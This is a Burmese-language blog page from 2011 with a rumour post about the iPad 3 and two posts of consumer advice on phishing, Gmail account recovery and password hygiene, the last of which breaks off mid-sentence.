Saturday, December 31, 2011

iPad-3 အား ခန့်မှန်းချိန် ထက်စော၍ ဈေးကွက် တင်မည်

iPad3
 
20
 
1
 
မဲပေးပါ
DK – Apple ကုမ္ပဏီမှ တတိယမျိုးဆက် အိုင်ပက်ဒ် (iPad-3) အား ယခင်ခန့်မှန်းထားကြသော
မတ်လ (သို့) ဧပြီလတို့ထက်စောလျင်ပြီး Apple တည်ထောင်သူ စတိဗ်ဂျော့ဘ်စ် (Steve Jobs)
၏ (၅၇) နှစ်မြောက်မွေးနေ့ဟုဆိုကြသော ဖေဖေါ်ဝါရီလ (၂၃) ရက်နေ့ထက်မတိုင်မီတရက်နေ့တွင်
စတင်ရောင်းချကောင်းရောင်းချနိုင်မည်ဖြစ်သည်။
iPad 3 တွင် လက်ရှိရောင်းချနေဆဲ အိုင်ပက်ဒ်များ၏ မျက်နှာပြင် ကြည်လင်ပြတ်သားမှုထက်
နှစ်ဆပို၍ ကောင်းမွန်သော မျက်ကြည်လွှာမျက်နှာပြင် (Retina Display) ပါရှိမည်ဖြစ်သည်ဟု
ပြီးခဲ့သောကြာသပတေးနေ့တွင် စီးတီးဂရု(ပ်) မှ သုတေသီတဦးဖြစ်သည့် ရစ်ချဒ်ဂဒ်နာ (Richard
Gardner) မှရေးသားခဲ့သော သုတေသနမှတ်စုတခုတွင် ဆိုထားခဲ့သည်။ iPad 3 ၏ ကြည်
လင်ပြတ်သားမှုအတိုင်းအတာမှာ (2048 x 1536 pixels) ဖြစ်ပြီး၊ လက်ရှိအိုင်ပက်ဒ်များတွင်မူ
(1024 x 768 pixels) ရှိသည်။ ပိုမိုကောင်းမွန်သော နောက်ခံအလင်းပေးနည်းပညာကြောင့် iPad
3 ၏အထူမှာလည်း iPad 2 ထက် (0.7 mm) ပို၍ထူလာမည်ဖြစ်သည်။ ထို့ပြင် iPad 3 ၌ 3G
Networks များကို အသုံးပြုရတော့မည်မဟုတ်ပဲ သတင်းအချက်အလက်ပေးပို့ရယူရာ၌ ပိုမိုမြန်
ဆန်စေမည့် Super-Fast LTE Data Networks များကို အသုံးပြုသွားနိုင်မည်ဖြစ်သည်
ဆိုသောခန့်မှန်းပြောဆိုမှုများလဲ ရှိနေသည်။
အမေဇွန် (Amazon) မှ ယမန်လ နိုဝင်ဘာ (၁၄) ရက်နေ့မှစတင် ရောင်းချသော EBook Reader
ဖြစ်ပြီး iPad Killer ဟုဆိုကြသည့် (US$ 199) သာရှိပြီး ဈေးနှူန်းချိုသာသော (Kindle Fire)
Tablet ကွန်ပြူတာအား တန်ပြန်သည့်အနေဖြင့် အိုင်ပက်ဒ်အသေးစား (Mini iPad) အား လာမည့်
နွေဦးပေါက်တွင် ရောင်းချရန်ရှိ၍ iPad 3 ရောင်းချမည့်ကိစ္စအား ဆိုင်းငံ့ထားဦးမည်ဟု
အချို့သောကောလဟလ သတင်းများမှလည်း ဆိုကြသည်။

Amazon-Kindle-Fire-4
apple-ipad-3


Amazon-Kindle-Fire-1
iPad3


Related articles
  • iPad 3: What We Know So Far (pcworld.com)
  • ‘Leaked’ iPad 3 mic hints at design overhaul – GMA News (gmanetwork.com)
  • Can a $100 iPad case improve 3G data power? (arstechnica.com)
  • Alleged iPad 3 component suggests major redesign (ubergizmo.com)
Unknown at 11:18 AM 0 မှတ်ချက်ကလေးရေးပေးနော်.
Share

အင်တာနက်၊အီးမေးလ် လုံခြုံရေး

သိပြီးတဲ့သူတွေလည်းသိပြီးနေပြီ ဗျ မသိသေးတဲ့ ဘော်ဘော်တွေအတွက်......

 
ခုတလော အွန်လိုင်းပေါ်မှာ အီးမေးလ် ထဲ Spam လွှတ်တဲ့ ပြဿနာလေးတွေ ကြိုတင်သတိပေးထားတဲ့ကြားက ဖြစ်ဖြစ်လာကြလွန်းလို့ ကျနော့် မေးလ် inbox ထဲ ခဏခဏ ဖျက်ပစ်နေရသည်။ဘယ်သူ့တော့ ထိသွားပြီဆိုပြီး ထိုင် စိုးရိမ်နေရသည်။အချိန်မီ ပြင်ရမယ့်အရာတွေ လုပ်သင့်တာတွေကို လှမ်းပြောရနဲ့ အွန်လိုင်း ရောက်တာနဲ့ အလုပ်တခုလိုဖြစ်နေရသည်။
ကျနော်တို့ မိတ်ဆွေတွေ ဗဟုသုတ တွေရှိလျှက်နဲ့ တချက်ပေါ့ဆ လိုက်တာနဲ့ ဆုံရှုံးမှုကကြီးထွားသွားနိုင်ပါတယ်။
ကျနော့်ဆီလာတဲ့ ပုံစံလေးက…ဒီလိုဗျ။

ကျနော်နဲ့ ရင်းနှီးတဲ့ သူငယ်ချင်း တယောက်နံမည်နဲ့ အဲဒီဆိုက်ဒ်ကိုဝင်ပြီး ဂျပန်ပြည်သူတွေအတွက် မီးထွန်းပါတဲ့၊ ကျနော်လည်း အေးလေ ထွန်းပေါ့ ဆိုပြီးကျနော် ထွန်းလိုက်ပါတယ်။ လူသားခြင်း စာနာထောက်ထားပြီး ဒီလောက်လေးတော့ ကိုယ်တတ်အားသမျှပါဝင်သင့်တယ်ဆိုပြီးပေါ့ဗျာ။
အွန်လိုင်းမှာ တချို့ Ads စာမျက်နှာတွေ မှာ click အလိုက် ဂူဂဲလ်က ရန်ပုံငွေပေးတာမျိုးရှိပါတယ်။


ဒါပေမယ့် ကိုယ်တော်ချောက မီးထွန်းရုံနဲ့ မပြီးဘူးဗျ သင့်အီးမေးလ် လိပ်စာပေးပါတဲ့ …သြော်…ဒါဆို သူနောက်ထပ် အကြောင်းအရာအသစ်တွေ ကြော်ငြာတွေ ပို့ဖို့ဆိုတာ ကိုယ်နားလည်ပြီ။ကိစ္စမရှိဘူး မကြိုက်ယင် ဖျက်ရုံပေါ့ ဒါမှမဟုတ်လည်း Filter တခုဆောက်ပြီး သတ်သတ်ခွဲထားတာ တို့ စပန်းမေးလ် အဖြစ်သတ်မှတ် တံဆိပ်ကပ်လိုက်ရုံပဲ ဆိုပြီး ကျနော်လည်းပေးလိုက်တယ်၊နောက်ပြီး အောက်ကနေထပ်ပြီး သင့်အီးမေးလ် ရဲ့ ပါ့စဝပ်ဒ် ပေးပါဦးတဲ့… ဟာ..ဒါကတော့ လွန်လာပြီ လို့ ကျနော် ထင်လိုက်တယ်..။ဒါမျိုးက ကိုယ့်ချစ်သူတောင် ကိုယ့်ကိုတောင်းတာမဟုတ်ဘူး ဟက်ကာတွေနဲ့ ထောက်လှမ်းရေးတွေပဲလုပ်တာလေ။ကျနော်လည်း နှာကောက်ပြီး ပိတ်လိုက်တယ်။အဲ… ပိတ်တာတောင်မှ မောက်စ်နဲ့ ကလစ်ပြီး မပိတ်ဘူး Alt ကီးနဲ့ F4 ကီးနဲ့ တွဲနှိပ် ပြီးပိတ်လိုက်ပါတယ်။ဘာဖြစ်လို့လဲ ဆိုတော့ ဗိုင်းရပ်စ် ထည့်ချင်တဲ့ ပရိုဂရမ်လေးတွေမှာ ကျနော်တို့ သာမန်နားလည်ထားတဲ့ ပိတ်ချင်ယင် နှိပ်ရတဲ့ X အမှတ်အသားကို နှိပ်လိုက်မှ လာပါ၊ဝင်ပါခင်ဗျ လို့ လက်ခံလိုက်တဲ့ ကွန်မန်း ထည့်ထားတတ်ပါတယ်။(တော်သေးတယ် ကိုပုရစ် ဆီမှာ သင်တန်းတက်ထားလို့)
ဒါနဲ့ ဒီလိုလုပ်တာ ဘယ်သူလဲ၊ဘာရည်ရွယ်ချက်လဲ ဆိုတာသိချင်လို့ အင်ဂျင် တခုကိုသုံးပြီး ရှာကြည့်လိုက်တော့ ကိုယ်တော်ချောက အိန္ဒိယ က Developer တယောက်ပါ။သူ့ကုပ္မဏီက ကြော်ငြာထည့်ချင်တာလောက်ပဲ လို့ ခန့်မှန်းရပါတယ်။သူ့အီးမေးလ်၊ဖုန်းနံပါတ်၊အင်တာနက် ကုပ္မဏီလိပ်စာ စတဲ့ အချက်တွေကို ကျနော်ကူးယူလိုက်ပြီး မသိသေးတဲ့သူတွေကို အသိပေးဖို့ ကျနော့် contact ထဲမှာ ရှိတဲ့ သူတွေကို ပို့လိုက်ပါတယ်။ဒါတင်မက ကျနော့် Face Book ကိုဖွင့်ပြီး ပို့စ် တင်လိုက်ပါတယ်။ဒီလိုဟာမျိုး ကကြော်ငြာထည့်တာလောက် မဟုတ်ပဲ ကိုယ့်အီးမေးလ် ပါ့စ်ဝပ်ဒ် ကိုပါတောင်းလာတယ် ဆိုယင် အန္တရာယ်ဟာ ငယ်ထိပ်ပေါ်ရောက်နေပြီ မဟုတ်လား။

မကြာပါဘူး ကျနော့်မိတ်ဆွေ တွေဆီက သူတို့လည်းတွေ့လို့ ကြိုတင်ကာကွယ်လိုက်ကြောင်းပြန်လာပါတယ်။တချို့လည်း ကျနော်မပြောခင်ကတည်းက ဒီလိုမာယာတွေနဲ့ နိုင်ငံရေး၊လူမှုရေး ဘန်းပြပြီး လူတွေကို သနားစိတ်၊ကိုယ်ချင်းစာစိတ်ဖြစ် စေတဲ့ ဆူနာမီလို ကိစ္စတွေ၊ကလေးငယ်တွေကိစ္စ၊စတာတွေနဲ့ လူ့စိတ်ကိုမြူဆွယ်ပြီး ဗိုင်းရပ်စ် တို့ ကြော်ငြာတို့ ထည့်ဝေတဲ့ ကိစ္စမှာ အတွေ့အကြုံရှိကြလို့ သိနေကြပါပြီ။

မကြာခင်တုန်းကလည်း အွန်လိုင်းမှာ ပြန့်နှံ့နေတဲ့ လှုံ့ဆော်ရေး စာလိုလို ဘာလိုလို စာတစောင်ရောက်လာပါ သေးတယ်။သူ့စာကဆိုတာကတော့ မြန်မာနိုင်ငံကို စစ်ရေးအရ ဝင်ရောက်ဖြေရှင်းမယ်ဆိုယင် မဲပေးပါတဲ့၊ကျနော် စစ်ကြည့်လိုက်တော့ သူက အမေရိကန်ကပါ။ တော်သေးတယ် ပြောရမှာက သူကတော့ အီးမေးလ်လိပ်စာတွေပဲ ယူပြီး ပါ့စဝပ်ဒ် မတောင်းပါ။ဒါပေမယ့် အီးမေးလ်လိပ်စာတွေ ရသွားခဲ့ယင်လည်း ကြော်ငြာပို့တဲ့ သူတွေကို ရောင်းစားလို့ရပါတယ။် ဒါကိုလည်း ကျနော်တို့ မိတ်ဆွေများ သတိပြုစေချင်ပါတယ်။ အခုဆို ဝက်ဘ်ဆိုက်ဒ်တွေ မှာ ရီဂျစ်စတာလုပ်ယင် သိက္ခာရှိ ကုပ္မဏီတွေက ဆိုယင် ကျနော်တို့ ကပ်စတမ်မာ ရဲ့အီးမေးလ် လိပ်စာကို တခြားသူဆီရောင်းမစားပါဘူး ဆိုတဲ့ ကတိကဝတ်လုပ်တာမျိုးတွေ ရှိပါတယ်။ဝက်ဘ်ဆိုက်ဒ်တွေရဲ့ Terms & Condition ကိုဖတ်ကြည့်နိုင်ပါတယ်။
ဒါကြောင့် မယုံကြည်ရတဲ့ ဝက်ဘ်ဆိုက်ဒ်ဆိုယင် မိမိ ပါ့စဝပ်ဒ် မပြောနဲ့ အီးမေးလ် လိပ်စာကိုတောင် မပေးသင့်ပါဘူး။အချို့က လုပ်သေးတယ် ဒါက အပျော်မေးလ်လိပ်စာ ပျက်သွားလည်း အသစ်တခု ဖွင့်ရုံပဲလို့ ပြောတတ်ပါသေးတယ်။အခုနေအလကားပေးနေသေးတယ် ဆိုပေမယ့် ကိုယ့်ထဲမှာရှိတဲ့ မိမိ အဆက်အသွယ် တွေရဲ့ လိပ်စာတွေကကိုယ့် လိုအပျော်ဖွင့်ထားတဲ့ အကောင့်တွေ မဟုတ်ခဲ့ဘူး ဆိုယင် သင် ဘယ်လိုလုပ်မလဲ လို့ မေးစရာရှိပါတယ်။Spam အင်ဂျင်က အတည်နဲ့ ကိုယ်ပို့သလိုလို နဲ့ပို့တာကို သူတဖက်သားက ယုံပြီး လိုက်လုပ်လို့ ဆုံးရှုံးသွားခဲ့ယင် ကိုယ်လည်း စိတ်ကောင်းရမှာမဟုတ်ပါဘူး။

ကျနော့်ဆီကို လာတဲ့ မီးထွန်မေး ဆိုယင် ခေါင်းစဉ်တပ်လာတာကိုက အချင်းချင်းခေါ်တဲ့ လေသံနဲ့လာတာပါ လေသံလေးက ငြင်ငြင်သာသာရယ်။ ဆရာ….. တဲ့။

ဒါက ကိုယ့် Contact မှာ ရေးထားတဲ့အတိုင်း သူကအယောင်ဆောင်ပြီး ပို့တာပါ။သတိရှိလို့ ဘာမှမဖြစ်ခဲ့ဘူးဆိုပေမယ့်လည်း သတိဆိုတာ ပိုတယ်မရှိပါဘူး။

ဒါနဲ့ သတိပေးစာတွေကျနော်ပို့ပြီး ၂ ရက်လောက်ကြာတော့ ဒီကြားထဲမှာပဲ ကျနော့် အီးမေးလ် မရောက်လို့ပဲလား မသိလို့ပဲလား မပြောတတ်ဘူး ကျနော့် မိတ်ဆွေတွေထဲ ၂ ယောက် ၃ ယောက်လောက်က ကျနော့်ကို မီးထွန်းဖို့ စာတွေ ပြန်ဖြန့်ဖို့ စာတွေ ထပ်ပို့လာပြန်ပါတယ်။ကျနော်သိလိုက်ပါတယ်။ဒါသူတို့ပို့တာမဟုတ်ပါ။သူတို့အီးမေးလ် ပါ့စဝပ်ဒ် ပေးလိုက်ကြရပါပြီ။ဒါကြောင့်  ပါ့စဝပ်ဒ် ပြောင်း ဖို့ စာတွေ ပို့၊လုပ်ပုံလုပ်နည်းတွေ ထပ်ပို့ပေးလိုက်ရပါတယ်။

အခုခေတ်က နည်းပညာသစ်တွေတိုးတက်လာသလို၊ဆက်သွယ်မှု နယ်ပယ်ကလည်း ကျယ်ပြန့်လာပါပြီ။ရုံးလုပ်ငန်းတွေကအစ လမ်းပေါ်မှာသွားနေယင်းနဲ့ လက်ပ်တော့ ဆိုတဲ့ခေတ်ကိုကျော်ပြီး အိုင်ပက် လို ဂဲလက်ဆီ လို မိုဘိုင်း ကိရိယာတွေနဲ့ လုပ်လို့ရနေပါပြီ။ အားလုံးဟာ အွန်လိုင်းပေါ်ရောက်ယင် ကွန်ယက်ထဲမှာ ရှိနေတာကြောင့် လွဲချော်မှု တခုခု ဖြစ်ခဲ့ယင် ဆက်တိုက်လွဲချော်မှုတွေ ဖြစ်လာပြီး ဆက်နွယ်နေတဲ့ လုပ်ငန်းစုတွေ အကုန်လုံးထိခိုက်နိုင်ပါတယ်။ဂျီမေးလ် တခုထိတာနဲ့ မိမိရဲ့ FaceBook,Twitter,Blogger,youtube,google document နဲ့ google Calendar စတဲ့ ကွန်ယက်တွေမှာပါသွားပြီး ထိခိုက်တတ်ပါတယ်။
ဒါနဲ့ တချို့က ကိုယ့်မေးလ် ပါ့စဝက်ဒ် မပြောင်းတတ်သူများလည်းရှိ၊လုံခြုံရေးကိုဘယ်လိုကာကွယ်မယ် မသိကြသူတွေလည်း ရှိကြသေးတာမို့ ရပ်ဝေးရပ်နီးမိတ်ဆွေ များ အတွက်စိုးရိမ်မိပါတယ်။နောက်ရက်များမှာတော့ အီးမေးလ်ကိုလုံးဝဖွင့်မရတဲ့ သူတွေရယ်၊ သူတို့မေးလ် အကောင့်ကနေ လင့်တွေလျှောက်ပို့တဲ့ ကိစ္စတွေ ဆက်တိုက်ဆိုသလိုများပြားလာပါတယ်။ တစ်ဦးချင်းစီ ပြောပြပေးရုံမက ကိုယ်တိုင်ဝင်ရောက်ပြီး ပြန်ဆယ်ပေးရတာလည်း များလာလို့ အားလုံးသိရအောင် ထပ်ပြီးရေး လိုက်ရပါတယ်။


ပထမဦးဆုံး အနေနဲ့ မေးလ်ကိုဖွင့်လို့ရသေးယင် အောက်ခြေနားက Detail ကိုနှိပ်ပြီး sign out all other section ဆိုတာကိုနှိပ်လိုက်ပါ။ဒီစာတမ်းကို မြင်ရတယ် ဆိုကတည်းက မိမိအီးမေးလ်ဟာ တနေရာရာ မှာ အကြောင်းတခုခုကြောင့် ပွင့်နေတာသေချာပါပြီ။အနည်းဆုံး Sign out မလုပ်မိပဲပိတ်ခဲ့တဲ့ မိမိစက်ရဲ့ Browser coockie ထဲမှာလည်းရှိနေနိုင်ပါတယ်။
အင်တာနက်ဆိုင်မှာ၊ရုံးမှာ၊အိမ်မှာ သို့မဟုတ် ကိုယ်မဟုတ်တဲ့ အခြားတနေရာမှာပေါ့။ဟက်ကာဆီမှာ ဆိုယင်တော့ ကိုယ်ကျိုးနဲ ပြီပေါ့။sign out all other section စာသားရဲ့အောက်မှာ ဇယားကွက်ကလေး တခုရှိပါတယ်။ဒီအီးမေးလ် ကိုဖွင့်ဝင်သွားတဲ့ နိုင်ငံအမည်၊အိုင်ပီ လိပ်စာ နဲ့ ရက်စွဲ၊အချိန်တွေကို ဖေါ်ပြပေးထားပါတယ်။ထူးခြားတဲ့ အိုင်ပီနဲ့ နိုင်ငံ တွေက ဖွင့်ဝင်လာခဲ့ယင် Googleက စာတန်းအနီနဲ့သတိပေးတတ်ပါတယ်။ ထူးခြားတဲ့၊မဖြစ်နိုင်တဲ့ အိုင်ပီဆိုတာက ခုပဲထိုင်းနိုင်ငံ အိုင်ပီ လိပ်စာ ကနေ ဖွင့်ပြီး လူကိုယ်တိုင် ချက်ချင်း မရောက်နိုင်တဲ့ အကန့်အသတ်ရှိတဲ့ မိနစ်ပိုင်း၊နာရီပိုင်းမှာ အမေရိကန်နိုင်ငံလိုအလှမ်းဝေးတဲ့ အိုင်ပီ တခုခု ကနေ ဖွင့်တယ် privacy setting တွေကိုလည်းဖွင့်တယ်၊ဝင်လာသမျှအီးမေးလ်တွေကို အခြားမေးလ် တခုထဲကို  forward လုပ်ပစ်တာမျိုးလည်းရှိပါတယ်။


ဒါက ခိုးယူခံရတဲ့အီးမေးလ် တခုပါ။အမေရိကန် နိုင်ငံက အိုင်ပီလိပ်စာ အသစ်နဲ့ ၃ ကြိမ် ဝင်ထားပါတယ်။လွန်ခဲ့တဲ့ ၃ ရက်လောက်ကတည်းက ဝင်ထားတာကိုမသိဘူး၊နောက်ထပ်ဝင်တာတွေကိုလည်းမသိပဲ နောက်ဆုံး ဖွင့်လို့မရ တော့မှပဲ ကျနော့်ဆီ ရောက်လာပြီး ကျနော် ဖွင့်ကြည့်တော့မှ ဒါကိုတွေ့တာပါ။ ခက်ပြီပေါ့။ နောက်သူငယ်ချင်းတယောက်ရဲ့ အီးမေးလ် ကနေ လင့်တွေ ပို့လာပါတယ် ၂ ရက် ၃ရက်ကြာတော့ သူနဲ့ လမ်းမှာ တွေ့တော့ ဘာတွေ ပို့တာလဲ လို့ သူ့ကိုမေးတော့ မှ သူမပို့ကြောင်းပြောလို့ သူ့အကောင့်ကိုစစ်ကြည့်ပါတယ်။အလားတူပဲ ချီလီ နိုင်ငံ လိပ်စာနဲ့ တကြိမ် စပိန်နိုင်ငံ လိပ်စာနဲ့ တကြိမ်တွေ့ပါတယ်။

အဲဒီတော့ Change Your password ကိုနှိပ်ပေတော့။
အဲဒီနေရာမှာ password ပြောင်းရုံတင်မကပါဘူး၊တကယ်လို့ ကိုယ့်အီးမေးလ်ကို အခိုးခံရယင်ပြန်ပြီး recover လုပ်ဖို့ Option တွေရှိပါသေးတယ်။ Secondary Email address တခုခု ပေးထားလို့ရသလို၊ မိမိရဲ့ မိုဘိုင်းဖုန်းနံပါတ်ပေးထားမယ်ဆို verification code ပေးပိုတဲ့စနစ်လည်းရှိပါတယ်။Google ပြက္ခဒိန်သုံးယင်လည်း Alam ပေးတဲ့ မက်ဆေ့ခ်ျ ကို မိမိ မိုဘိုင်းဖုန်းထဲကို ပို့ပေးပါတယ်။အဲဒါတွေက ဂူဂဲလ် ကအခမဲ့ဝန်ဆောင်မှုပေးတာပါ။ပြီးတော့ two step verification ဆိုတဲ့နေရာမှာ မိမိရဲ့ ပထမပေးထားတဲ့ ဖုန်းကိုဆက်သွယ် လို့မရယင် ဒုတိယ ဆက်သွယ်ရမယ့် နံပါတ်ပေးလို့လည်းရပါတယ်။


ပထဦးဆုံး မိမိ ရဲ့ဖုန်းထဲကို Google ကပို့လိုက်တဲ့ မက်ဆေ့ခ်ျ မှာပါတဲ့ နံပါတ်ကို Verify လုပ်ဖို့ပေးထားတဲ့ အကွက်ထဲမှာ ရိုက်ထည့်ပြီး Verify ကိုနှိပ်ရပါမယ်။ဒါဆိုယင် ပြီးပြီလား၊မပြီးသေးပါဘူး။Inbox ထဲကမသင်္ကာတဲ့မေးလ် တွေကို Report Spam လုပ်ရမယ်။ဂူဂဲလ် products ဖြစ်တဲ့ ပြက္ခဒိန်တို့၊Google document တို့မှာ iPaper တို့ Scribd တို့လို ဆိုက်ဒ်တွေကနေ ကိုယ့်ရဲ့အီးမေးလ် ကို Access လုပ်ဖို့ ခွင့်ပြုထားလား၊ဖွင့်ထားလားဆိုတာကြည့်ရပါမယ်။
ဒီလို စစ်ဆေးမှုမျိုးကို တခါ တလေ အကြောင်းထူး ရှိခဲ့ယင်ပဲဖြစ်ဖြစ် ပုံမှန်အနေအထားမှာ ပဲလို့ ထင်ရတဲ့ အခါမှာပဲဖြစ်ဖြစ် ကိုယ့်အီးမေးလ် လုံခြုံရေး နဲ့ပါတ်သက်ပြီး အတတ်နိုင်ဆုံး တပါတ်တခါ လောက် နဲ့ ဖြစ်နိုင်ယင် အဖွင့် အပိတ်လုပ်တိုင်း အမြဲတမ်းစစ်ဆေးပါ။၊ mail setting – general မှာ Always use https ကိုသုံးဖို့ အမှတ်ထဲ့ပါ။ မသင်္ကာယင် ပါ့စဝပ်ဒ်ကို ချက်ချင်းပြောင်းပစ်ပါ။

လုံခြုံမှုရှိတဲ့ ပါ့စဝပ်ဘယ်လိုလုပ်ရမလဲ
တကယ်တော့ လုံခြုံရေး ဆိုတာ အွန်လိုင်းပေါ်မှာ မရှိဘူးလို့ပြောရမှာ ဖြစ်ပါတယ်။ဒါပေမယ့် မရှိဘူးဆိုတာက မကောင်းမှုဆိုတာ ဆိတ်ကွယ်ရာမရှိဆိုတဲ့ ပုံစံမျိုးလိုပါပဲ။ရနိုင် သလောက် လုံခြုံအောင် လုပ်ရပါတယ်။ လုံခြုံမှုအရှိဆုံးနဲ့စိတ်အချဆုံးပါ့စဝပ်ဒ် ရဲ့ လက္ခဏာရပ်တွေကတော့ …..ပါ့စဝပ်ဒ်ဆိုတာ ..
•    ၁)စာလုံးရေ ၂၀ အထက်သုံးသင့်ပါတယ်။
•    ၂)အဘိဓာန်ထဲမှာ တွေ့ရတတ်တဲ့ စကားလုံးမျိုး မဖြစ်သင့်ပါဘူး။
•    ၃)မိမိ နံမည် မွေးနှစ်၊သက္ကရာဇ်၊မှတ်ပုံတင်နံပါတ် စတဲ့အချက်အလက်တွေလည်း မဖြစ်သင့်ပါဘူး
•    ၄)စာလုံးကြီး၊စာလုံးသေး၊အက္ခရာနဲ့ ဂဏန်း တွေ သင့်တင်စွာ ရောထွေးပြီးပါသင့်တယ်။
•    ၅)အထူးစာလုံးတွေ ဖြစ်တဲ့ !@#$%^&*+_ >(){}[] \?/= စတာတွေအပြင် space bar ကိုလည်းနှိပ်ပြီး ထည့်သင့်ပါတယ်။
•    ၆)ပါ့စဝပ်ဒ် ကိုမကြာခဏပြောင်းသင့်ပါတယ်။
•    ရ)ပါ့စဝပ်ဒ် ကိုရိုက်တဲ့ နေရာမှာ ရိုက်လိုက်၊ပြန်ဖျက်လိုက်၊ပြန်ရိုက်လိုက် လုပ်သင့်ပါတယ်။
•    ၈)တချို့တဝက်ကိုသာရိုက်ပြီး၊တချို့တဝက်ကို ကော်ပီကူး၊ပြန်ချ လုပ်တဲ့စနစ်ကိုလည်းသုံးသင့်ပါတယ်။
•    ၉) ၂ပြန် ၃ပြန် လုပ်တဲ့ စနစ်ကိုသုံးသင့်ပါတယ်။ဥပမာ။      qwert234$#@    qwert234$#@    qwert234$#@

ကဲဒီလောက်ဆို လုံခြုံလောက်ပြီ ထင်ပါရဲ့နော် အဲ..အဲ.. ဒါပေမယ့် အရေးအကြီးဆုံးအချက်က ကိုယ်ဘယ်လောက်ပဲ ပါ့စဝပ်ဒ် ကို လုံခြုံအောင် လုပ်ထားပါစေ သူများသိနိုင်တဲ့ အချက်တချက်ရှိပါသေးတယ်။
အဲဒါကတော့ မိမိကိုယ်တိုင်က ဖွင့်ပြောလိုက်တာ၊ပေးလိုက်တာမျိုး ဖြစ်ပါတယ်။သတိကြီးစွာနဲ့ အွန်လိုင်းမှာ ဖွန်ဖိုင်း…. အဲ..ဆောရီး….။ အွန်လိုင်းမှာ အတိုင်းထက်အလွန် လုံလုံခြုံခြုံသုံးစွဲနိုင်ပါစေ။
Unknown at 11:07 AM 0 မှတ်ချက်ကလေးရေးပေးနော်.
Share

Onlineနှင့်ပတ်သတ်သောနည်းပညာ



မိမိ ဖွင့်သော Website သည် Official Site ဖြစ်ရန်
အွန်လိုင်းမှာ တစ်ချို့သော Website တွေက လာရောက်လည်ပတ်သူကို
ဒုက္ခပေးနိုင်တဲ့ malicious
code တွေ / virus တွေကို မြှပ်နှံ့ထားတတ်ပါတယ်.. ဒါကလည်း search engine
နဲ့ အချို့သော Social Site တွေကနေ ၀င်လာတဲ့ Link
တွေကြောင့်လည်းဖြစ်နိုင်ပါတယ်။ ဒါကြောင့် မိမိအသုံးပြုတဲ့ website က
Official Site ဖြစ်မှသာ ပိုပြီးစိတ်ချရပါတယ်။ Official Site မှာကော
malicious code တွေထည့်လို့မရဘူးလားဆိုတော့ ရပါတယ်.. ဒါပေမဲ့ ၄င်းတို့ရဲ့ Webmaster က အဲလို လုပ်ရင် တရားစွဲခံနေရမှာပေါ့။ freehosting နဲ့ တစ်ချို့ unofficial site တွေဆိုရင် ၄င်း site က မိမိကိုဒုက္ခပေးလို့ ဘယ်သူ့တရားစွဲရမှန်းမသိဘူး ဖြစ်နေလိမ့်မယ်။ ဥပမာ
(http://www.worldwidemyanmar.com/ ဘာကြောင့် Official Site ဖြစ်တာလဲ ?
http://www.worldwidemyanmar.com/about တရားဝင်မှတ်ပုံတင်ထားသော လုပ်ငန်း
ကုမ္ပဏီဖြစ်ခြင်း ) နောက်တစ်ခုက အများအသိအမှတ်ပြုထားတဲ့ personal
portfolio တွေ နဲ့ forums တွေ။ ဒါက
အနည်းငယ်သိအောင်အကြမ်းဖြင်းရှင်းပြတာ....

၂) မှန်းဆရခက်သော password ပေးခြင်း
တစ်ချို့က password ကို ၄င်းတို့ရဲ့ name ပေးတယ်။ တစ်ချိုက name
နဲ့မွေးသက္ကရာစ်ပေါင်းပေးတယ်။
နောက်တစ်ခုက keyboard က အစဉ်လိုက်ကိုပေးခြင်းပါ .. asdf123 , qwerty, နဲ့
name + 12345 စသည့်ပေးကြတယ်။
နောက်ဆုံးတစ်ခုက dictionary ကစာသားပါ။ password ပေးတော့မယ်ဆိုရင်
dictionary ထဲက စာသားကို
ဘယ်တော့မှမပေးပါနဲ့.. တစ်ချိုက lover, flower, angel, arsenal
စသည့်ဖြင့်ပေးကြပါတယ်။
ဒီလိုမျိုး password တွေကို ကွန်ပျူတာ အသုံးပြုတာတာ ၀ါရင့်နေတဲ့သူက
ခန့်မှန်းပြီး ရယူသွားနိုင်ပါတယ်။
ရိုးရှင်းတဲ့ Password အတွက် လွယ်ကူစွာပဲ bruteforce လုပ်သွားလို့ရပါတယ်။

၃) ဘယ်တော့မှ မိမိ password ကို email & chat messenger နဲ့မပို့ပါနဲ့
တစ်ခါတစ်လေမှာ တစ်ချိုက ၄င်းတို့ရဲ့ password ကို အချင်းချင်း chat တွေ mail
တွေထဲမှာပို့ထားကြပါတယ်.. ဒါက အရမ်းအန္တရာယ်များပါတယ်။ နောက်တစ်ခုက
official site တွေက ဘယ်တော့မှမိမိရဲ့ password ကို လှမ်းမတောင်းပါဘူး ဘယ်
system မှမရှိပါဘူး။ အကယ်၍ အဲ့လို user name & password
ကိုအတောင်းခံရရင် ဒါဟာ Social Engineering ထဲက Phishing Attack လုပ်တာပါပဲ။

၎) Password ကိုမကြခဏပြောင်းပါ။
ကျွန်တော်သတိထားမိသလောက် တစ်ချို့က ၄င်းတို့ရဲ့ Password ကို
အမြဲတမ်းအသေထားတတ်ကြတယ် ၂ နှစ် ၃
နှစ်လောက်အထိပေါ့။ တကယ်တမ်းက ဒီလို Password ကိုခဏခဏ ပြောင်းသင့်ပါတယ်။

၅) ကိုယ်ပိုင်ကွန်ပျူတာကိုသုံးပါ။
အကယ်၍ မိမိက အများသူငှာသုံးတဲ့ Cyber & Hot spot
လိုနေရာမျိုးမှာသုံးမယ်ဆိုရင် သတိထားရပါတယ်။ Banking & Online
Transaction တွေဆိုရင်လုံးဝကိုမသုံးသင့်ပါဘူး။ မိမိကွန်ပျူတာတွင်ပဲသုံးပါ။
အကယ်၍ plublic နေရာတွေမှာသုံးခဲ့ရင် auto complete သို့မဟုတ် save
password ဆိုတဲ့ web browser ကမေးတာကို no နဲ့သာဖြေပါ။ အသုံးပြုပြီးပါက IE
ဆိုရင် Tools > Internet Options > Content > AutoComplete.
Uncheck option “User names and passwords on forms” and click on “Clear
Password”. Click “OK" လုပ်ပါ။ FireFox ဆိုရင် Clear Recent History or
Clear Private Data ကိုလုပ်ပါ။ မိမိရဲ့ သုံးနေသောကွန်ပျူတာတွင် မည်သည့်
ဟက်ကင်း software မှမရှိအောင်ကြည့်ပါ။

၆) မိမိကွန်ပျူတာတွင်း Firewall, Antivirus, Antispyware ကိုထည့်ထားပါ။
Firewall, Antivirus, Antispyware ကိုထည့်၍ အမြဲတမ်း Update လုပ်ပေးပါ။
မိမိရဲ့ ကွန်ပျူတာကို Scan ပုံမှန်ဖတ်ပါ။

၇) မိမိ user name & password ကိုဘယ်တော့မှမသယ်ဆောင်ပါနဲ့
ဒါကတော့ မိမိရဲ့ user name & password ကို တစ်ချို့က စာရွက်လေးနဲ့
